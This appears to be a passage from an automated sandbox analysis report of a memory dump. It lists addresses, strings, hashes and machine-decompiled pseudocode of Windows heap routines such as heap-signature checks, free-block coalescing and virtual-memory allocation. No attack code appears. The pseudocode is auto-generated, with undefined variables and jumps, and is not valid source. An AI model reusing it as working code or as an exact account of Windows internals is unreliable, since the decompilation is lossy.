                                  0x018a3df7
                                  0x018a3dfc
                                  0x018a3dfe
                                  0x018a3e01
                                  0x018a3e01
                                  0x018a3e06
                                  0x018f824d
                                  0x018f824f
                                  0x018f8254
                                  0x00000000
                                  0x018a3e0c
                                  0x018a3e11
                                  0x018a3e16
                                  0x018a3e19
                                  0x018a3e29
                                  0x018a3e2c
                                  0x018a3e2f
                                  0x018f825c
                                  0x018f825f
                                  0x018f8261
                                  0x018f8264
                                  0x018f826c
                                  0x018f8280
                                  0x018f8282
                                  0x018f8282
                                  0x018f8289
                                  0x018f8290
                                  0x018f8293
                                  0x018f8294
                                  0x018f8298
                                  0x018f829b
                                  0x018f829b
                                  0x018a3e35
                                  0x018a3e38
                                  0x018a3e3d
                                  0x018a3e44
                                  0x018a3e58
                                  0x018f82a3
                                  0x018f82a3
                                  0x018a3e58
                                  0x018a3e60
                                  0x018a3e6f
                                  0x018a3e74
                                  0x018a3e77
                                  0x018a3e77
                                  0x018a3e7a
                                  0x018a3e7f
                                  0x018a3e8c
                                  0x018a3e8c
                                  0x018a3e91
                                  0x00000000
                                  0x018a3e91

                                  Strings
                                  • Kernel-MUI-Language-Allowed, xrefs: 018A3DC0
                                  • Kernel-MUI-Language-SKU, xrefs: 018A3F70
                                  • WindowsExcludedProcs, xrefs: 018A3D6F
                                  • Kernel-MUI-Number-Allowed, xrefs: 018A3D8C
                                  • Kernel-MUI-Language-Disallowed, xrefs: 018A3E97
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-258546922
                                  • Opcode ID: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                                  • Instruction ID: 6a1811e3cd96d4d6524b2f30269fb0554baa0e02ed2b3048cf1d2c0a57cfbdc9
                                  • Opcode Fuzzy Hash: d90b2506a9a0d80a8f3a42d70fc6d5a4b37e2fbe98dfda57ac5eafa64e8539f9
                                  • Instruction Fuzzy Hash: 9FF14872D00619EBDB11DF98C980AEEBBB9FF59750F15006AEA05E7250E7749F01CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018940E1, Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 29%
                                  			E018940E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0189B150(", passed to %s", _t29);
					}
					_push("\n");
					E0189B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1986378 = 1;
						asm("int3");
						 *0x1986378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                  0x018940e6
                                  0x018940e8
                                  0x018940f1
                                  0x018f042d
                                  0x018f044c
                                  0x018f0451
                                  0x018f042f
                                  0x018f0444
                                  0x018f0449
                                  0x018f045d
                                  0x018f0466
                                  0x018f046e
                                  0x018f0474
                                  0x018f0475
                                  0x018f047a
                                  0x018f048a
                                  0x018f048c
                                  0x018f0493
                                  0x018f0494
                                  0x018f0494
                                  0x00000000
                                  0x018f049b
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                  • API String ID: 0-188067316
                                  • Opcode ID: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                                  • Instruction ID: 10c706ca7c52b17eeb82715b0a33f8b3f0bf3799578abf41751b4c0f7031f374
                                  • Opcode Fuzzy Hash: 200b5fe93469a4c0b20d651e0f3cf7327133aea1022151d50131b243e8dcd5a4
                                  • Instruction Fuzzy Hash: 13012832104A419EE725976DA48DFA677A4DB12F34F2C407EF105CB752DAE8D640C621
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BA830, Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E018BA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1988748 - 1;
					if( *0x1988748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
									_t260 = _t257 + 4;
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0189B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1987bc8;
								if(__eflags == 0) {
									E01952073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0195A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E018ED5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E018BAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0195A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0195A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1988748 - 1;
					if( *0x1988748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0189B150();
							} else {
								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0189B150();
							__eflags =  *0x1987bc8;
							if(__eflags == 0) {
								_t131 = E01952073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                  0x018ba83a
                                  0x018ba83c
                                  0x018ba83e
                                  0x018ba841
                                  0x018ba844
                                  0x018ba84a
                                  0x018baa53
                                  0x018baa59
                                  0x018baa59
                                  0x018ba858
                                  0x018ba85e
                                  0x018baaf5
                                  0x018baafc
                                  0x0190229e
                                  0x019022a2
                                  0x019022a8
                                  0x019022b3
                                  0x019022b5
                                  0x019022bb
                                  0x019022c1
                                  0x019022c5
                                  0x019022e6
                                  0x019022eb
                                  0x019022f0
                                  0x019022c7
                                  0x019022dc
                                  0x019022e1
                                  0x019022e1
                                  0x019022f3
                                  0x019022f8
                                  0x019022fd
                                  0x01902300
                                  0x01902307
                                  0x0190230e
                                  0x0190230e
                                  0x01902313
                                  0x01902313
                                  0x019022b5
                                  0x019022a2
                                  0x018baafc
                                  0x018ba864
                                  0x018ba869
                                  0x018baa5c
                                  0x018baa5e
                                  0x018ba86f
                                  0x018ba87f
                                  0x018ba885
                                  0x018ba885
                                  0x018ba88b
                                  0x018ba890
                                  0x018ba896
                                  0x018bab0c
                                  0x018bab0f
                                  0x018bab15
                                  0x01902320
                                  0x01902320
                                  0x018bab1b
                                  0x018ba89c
                                  0x018ba89f
                                  0x018ba8a2
                                  0x018ba8a2
                                  0x018ba8a5
                                  0x018ba8af
                                  0x018ba8b3
                                  0x018ba8b8
                                  0x018baa66
                                  0x018ba8be
                                  0x018ba8c5
                                  0x018ba8c6
                                  0x018ba8ce
                                  0x01902328
                                  0x01902332
                                  0x01902337
                                  0x01902337
                                  0x018ba8ce
                                  0x018ba8d4
                                  0x018ba8d8
                                  0x018ba8db
                                  0x018ba8de
                                  0x018ba8e1
                                  0x018ba8e5
                                  0x018ba8e8
                                  0x018ba8f0
                                  0x018ba8f3
                                  0x0190234c
                                  0x01902350
                                  0x01902355
                                  0x01902359
                                  0x01902359
                                  0x018ba8f9
                                  0x018ba901
                                  0x018baae4
                                  0x018baae4
                                  0x018baaea
                                  0x00000000
                                  0x018ba907
                                  0x018ba90a
                                  0x018ba91d
                                  0x018ba91d
                                  0x00000000
                                  0x018ba910
                                  0x018ba910
                                  0x018ba910
                                  0x018ba914
                                  0x018ba924
                                  0x018ba924
                                  0x018ba924
                                  0x018ba924
                                  0x018ba916
                                  0x018ba91b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x018ba91b
                                  0x018ba925
                                  0x018ba925
                                  0x018ba932
                                  0x018ba936
                                  0x018ba93c
                                  0x018ba93c
                                  0x018ba93c
                                  0x018bab22
                                  0x018bab24
                                  0x018bab27
                                  0x018bab27
                                  0x018ba942
                                  0x018ba944
                                  0x018baaba
                                  0x018baabd
                                  0x018baac0
                                  0x018baac0
                                  0x018baac2
                                  0x018bab2f
                                  0x018baac4
                                  0x018baac4
                                  0x018baac7
                                  0x018baaca
                                  0x018baacc
                                  0x018baace
                                  0x018baace
                                  0x018baace
                                  0x018baad1
                                  0x018baad1
                                  0x018baad7
                                  0x018baad9
                                  0x00000000
                                  0x00000000
                                  0x01902361
                                  0x01902369
                                  0x0190236b
                                  0x00000000
                                  0x01902371
                                  0x00000000
                                  0x01902371
                                  0x00000000
                                  0x0190236b
                                  0x018baac0
                                  0x018ba94a
                                  0x018ba94a
                                  0x018ba94d
                                  0x018ba94d
                                  0x018ba950
                                  0x018ba954
                                  0x01902376
                                  0x01902380
                                  0x018ba95a
                                  0x018ba95a
                                  0x018ba95c
                                  0x018ba95f
                                  0x018ba961
                                  0x018ba961
                                  0x018ba967
                                  0x018ba96a
                                  0x018ba972
                                  0x018baa02
                                  0x018baa06
                                  0x018baa10
                                  0x018baa16
                                  0x018baa16
                                  0x018baa1b
                                  0x018baa21
                                  0x018baa24
                                  0x018baa27
                                  0x018baa29
                                  0x018baa2c
                                  0x018baa32
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x018ba978
                                  0x018ba978
                                  0x018ba97b
                                  0x018ba981
                                  0x018ba996
                                  0x018ba998
                                  0x018ba99f
                                  0x018ba9a2
                                  0x0190238a
                                  0x018ba9a8
                                  0x018ba9a8
                                  0x018ba9a8
                                  0x018ba9aa
                                  0x018ba9ad
                                  0x018ba9b0
                                  0x018ba9bb
                                  0x018ba9be
                                  0x018ba9c7
                                  0x018ba9c9
                                  0x018ba9c9
                                  0x018ba9cc
                                  0x018ba9d1
                                  0x018baa6d
                                  0x018baa70
                                  0x018baa73
                                  0x018baa75
                                  0x018baa79
                                  0x018baa7e
                                  0x018baa82
                                  0x018baa8f
                                  0x018baa94
                                  0x018baa96
                                  0x01902392
                                  0x019023a1
                                  0x019023a1
                                  0x018baa9c
                                  0x018baa9f
                                  0x018baaa2
                                  0x018baaa2
                                  0x018baaa8
                                  0x018baaab
                                  0x018baaaf
                                  0x00000000
                                  0x018baab5
                                  0x00000000
                                  0x018baab5
                                  0x018ba9d7
                                  0x018ba9d7
                                  0x018ba9da
                                  0x018ba9e0
                                  0x018ba9e3
                                  0x018ba9e6
                                  0x018ba9e9
                                  0x018ba9eb
                                  0x018ba9fd
                                  0x018ba9fd
                                  0x00000000
                                  0x018ba9eb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x018ba983
                                  0x018ba983
                                  0x018ba983
                                  0x018ba987
                                  0x018ba995
                                  0x018ba995
                                  0x018ba995
                                  0x018ba995
                                  0x018ba989
                                  0x018ba98e
                                  0x00000000
                                  0x018ba990
                                  0x00000000
                                  0x018ba990
                                  0x018ba98e
                                  0x00000000
                                  0x018ba983
                                  0x018ba972
                                  0x018ba90a
                                  0x018baa34
                                  0x018baa34
                                  0x018baa40
                                  0x018baa43
                                  0x018baa46
                                  0x018baa4d
                                  0x019023ab
                                  0x019023b2
                                  0x019023b8
                                  0x019023be
                                  0x019023c3
                                  0x019023c5
                                  0x019023cb
                                  0x019023d1
                                  0x019023d5
                                  0x019023f6
                                  0x019023fb
                                  0x019023d7
                                  0x019023ec
                                  0x019023f1
                                  0x01902403
                                  0x01902408
                                  0x01902410
                                  0x01902417
                                  0x01902422
                                  0x01902422
                                  0x01902417
                                  0x019023c5
                                  0x019023b2
                                  0x00000000

                                  Strings
                                  • HEAP[%wZ]: , xrefs: 019022D7, 019023E7
                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01902403
                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019022F3
                                  • HEAP: , xrefs: 019022E6, 019023F6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                  • API String ID: 0-1657114761
                                  • Opcode ID: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                                  • Instruction ID: dafe782a4ffec24e123f3d0b91e9618f95c508c262b7018af55fc5944d27a9cd
                                  • Opcode Fuzzy Hash: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                                  • Instruction Fuzzy Hash: F2D1CF74A006069FDB29CF68C4D0BBABBF1BF48304F148569D95ADB781E334EA45CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018BA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E018BA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E018BDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E018D9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0195A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E018D9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0189B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E018B7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0195138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E018B7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E018B7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E018B7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E018B7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E018ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                  0x018ba229
                                  0x018ba231
                                  0x018ba23f
                                  0x018ba242
                                  0x018ba244
                                  0x018ba24c
                                  0x018ba255
                                  0x018ba25a
                                  0x018ba25f
                                  0x01901c76
                                  0x01901c78
                                  0x01901c7e
                                  0x01901c7f
                                  0x01901c81
                                  0x01901c82
                                  0x01901c84
                                  0x01901c89
                                  0x01901c8b
                                  0x01901c9e
                                  0x01901c9e
                                  0x01901cab
                                  0x01901cb2
                                  0x00000000
                                  0x01901cb2
                                  0x01901c8d
                                  0x01901c92
                                  0x00000000
                                  0x00000000
                                  0x01901c94
                                  0x01901c98
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01901c98
                                  0x018ba265
                                  0x018ba265
                                  0x018ba266
                                  0x018ba26f
                                  0x018ba270
                                  0x018ba276
                                  0x018ba277
                                  0x018ba279
                                  0x018ba27e
                                  0x018ba282
                                  0x01901db5
                                  0x01901dbb
                                  0x01901dc1
                                  0x01901dc5
                                  0x01901de4
                                  0x01901de9
                                  0x01901dc7
                                  0x01901ddc
                                  0x01901de1
                                  0x01901def
                                  0x01901df3
                                  0x01901df7
                                  0x01901dfe
                                  0x01901e06
                                  0x018ba302
                                  0x018ba308
                                  0x018ba308
                                  0x018ba288
                                  0x018ba28d
                                  0x018ba294
                                  0x01901cc1
                                  0x018ba29a
                                  0x018ba29a
                                  0x018ba29a
                                  0x018ba29f
                                  0x01901ccb
                                  0x01901cd1
                                  0x01901cd8
                                  0x01901cea
                                  0x01901cea
                                  0x01901cd8
                                  0x018ba2a9
                                  0x018ba2af
                                  0x018ba2bc
                                  0x01901cfd
                                  0x018ba2c2
                                  0x018ba2c2
                                  0x018ba2c2
                                  0x018ba2c7
                                  0x01901d07
                                  0x01901d0d
                                  0x01901d14
                                  0x01901d1f
                                  0x01901d21
                                  0x01901d2c
                                  0x01901d2c
                                  0x01901d2c
                                  0x01901d47
                                  0x01901d47
                                  0x01901d14
                                  0x018ba2cd
                                  0x018ba2d2
                                  0x018ba2d9
                                  0x01901d5a
                                  0x018ba2df
                                  0x018ba2df
                                  0x018ba2df
